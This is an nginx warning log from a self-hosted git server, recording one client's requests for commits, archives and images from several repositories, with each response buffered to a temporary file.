2026/02/15 09:33:02 [warn] 818#818: *14071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/54/0000004543 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:08 [warn] 818#818: *14071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/54/0000004544 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.bundle", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:10 [warn] 818#818: *14071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/54/0000004545 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/7e5f452449b5385fa46a3a589ed6aac00a02734a.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/7e5f452449b5385fa46a3a589ed6aac00a02734a.zip", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:37 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/54/0000004546 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/a0a212e41c7ebc2699ea736d71d145b9844673ec.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/a0a212e41c7ebc2699ea736d71d145b9844673ec.zip", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:37 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/54/0000004547 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.tar.gz", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:37 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/54/0000004548 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore?display=source", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:38 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/54/0000004549 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-eol", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:40 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/55/0000004550 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/ebd2be03a23e76e126207d40a257d72f40ab9a7c.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/ebd2be03a23e76e126207d40a257d72f40ab9a7c.zip", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:40 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/55/0000004551 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:40 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/55/0000004552 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?style=split&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?style=split&whitespace=ignore-eol", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:40 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/55/0000004553 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:41 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/55/0000004554 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:41 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/55/0000004555 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py?display=source", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:42 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/55/0000004556 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:44 [warn] 820#820: *14213 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/55/0000004557 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:59 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/55/0000004558 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/998d733eb52423ffff2f8602efdfb1282198a61f.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/998d733eb52423ffff2f8602efdfb1282198a61f.tar.gz", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:59 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/55/0000004559 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-change", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:59 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/56/0000004560 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-all", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:59 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/56/0000004561 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=show-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=show-all", host: "git.hanmocnn.co.kr"
2026/02/15 09:33:59 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/56/0000004562 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-eol", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:00 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/56/0000004563 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/63aec54418d3c1735d68bf046c7a9e78a247798d.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/63aec54418d3c1735d68bf046c7a9e78a247798d.tar.gz", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:03 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/56/0000004564 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/998d733eb52423ffff2f8602efdfb1282198a61f.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/998d733eb52423ffff2f8602efdfb1282198a61f.zip", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:04 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/56/0000004565 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/63aec54418d3c1735d68bf046c7a9e78a247798d.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/63aec54418d3c1735d68bf046c7a9e78a247798d.zip", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:05 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/56/0000004566 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?style=split&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?style=split&whitespace=ignore-eol", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:05 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/56/0000004567 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.tar.gz", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:05 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/56/0000004568 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?style=unified&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?style=unified&whitespace=ignore-all", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:05 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/56/0000004569 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=mail_contact.py HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=mail_contact.py", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:05 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/57/0000004570 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=unified&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=unified&whitespace=ignore-change", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:05 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/57/0000004571 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=unified&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=unified&whitespace=ignore-all", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:05 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/57/0000004572 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?style=split&whitespace=show-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?style=split&whitespace=show-all", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:06 [warn] 818#818: *14355 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/57/0000004573 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/a0a212e41c7ebc2699ea736d71d145b9844673ec.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/a0a212e41c7ebc2699ea736d71d145b9844673ec.tar.gz", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:26 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/57/0000004574 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:26 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/57/0000004575 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?style=unified&whitespace=show-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?style=unified&whitespace=show-all", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:26 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/57/0000004576 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:26 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/57/0000004577 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1?display=source", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:28 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/57/0000004578 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/ebd2be03a23e76e126207d40a257d72f40ab9a7c.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/ebd2be03a23e76e126207d40a257d72f40ab9a7c.tar.gz", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:28 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/57/0000004579 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:28 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/58/0000004580 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-change", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:28 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/58/0000004581 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-all", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:29 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/58/0000004582 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:29 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/58/0000004583 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:30 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/58/0000004584 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:30 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/58/0000004585 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?style=split&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?style=split&whitespace=ignore-all", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:33 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/58/0000004586 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/998d733eb52423ffff2f8602efdfb1282198a61f.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/998d733eb52423ffff2f8602efdfb1282198a61f.bundle", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:34 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/58/0000004587 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/63aec54418d3c1735d68bf046c7a9e78a247798d.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/63aec54418d3c1735d68bf046c7a9e78a247798d.bundle", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:35 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/58/0000004588 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/7e5f452449b5385fa46a3a589ed6aac00a02734a.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/7e5f452449b5385fa46a3a589ed6aac00a02734a.tar.gz", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:35 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/58/0000004589 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=unified&whitespace=show-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=unified&whitespace=show-all", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:36 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/59/0000004590 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.zip", host: "git.hanmocnn.co.kr"
2026/02/15 09:34:36 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/59/0000004591 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?style=split&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?style=split&whitespace=ignore-all", host: "git.hanmocnn.co.kr"
2026/02/15 10:13:27 [warn] 821#821: *14725 a client request body is buffered to a temporary file /tmp/nginx/body/7/59/0000004597, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "POST /windpacer/homepage.git/git-receive-pack HTTP/2.0", host: "git.hanmocnn.co.kr"
2026/02/15 10:51:39 [warn] 822#822: *14990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/60/0000004601 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/archive/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/archive/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa.bundle", host: "git.hanmocnn.co.kr"
2026/02/15 10:51:57 [warn] 823#823: *15107 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/60/0000004602 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/archive/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/archive/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.bundle", host: "git.hanmocnn.co.kr"
2026/02/15 10:51:57 [warn] 823#823: *15107 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/60/0000004603 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets", host: "git.hanmocnn.co.kr"
2026/02/15 10:51:57 [warn] 823#823: *15107 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/60/0000004604 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py?display=source", host: "git.hanmocnn.co.kr"
2026/02/15 10:54:10 [warn] 817#817: *15781 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/60/0000004605 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fletsencrypt.log.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fletsencrypt.log.3", host: "git.hanmocnn.co.kr"
2026/02/15 10:54:40 [warn] 819#819: *15986 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/60/0000004606 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 10:55:19 [warn] 818#818: *16087 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/60/0000004607 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
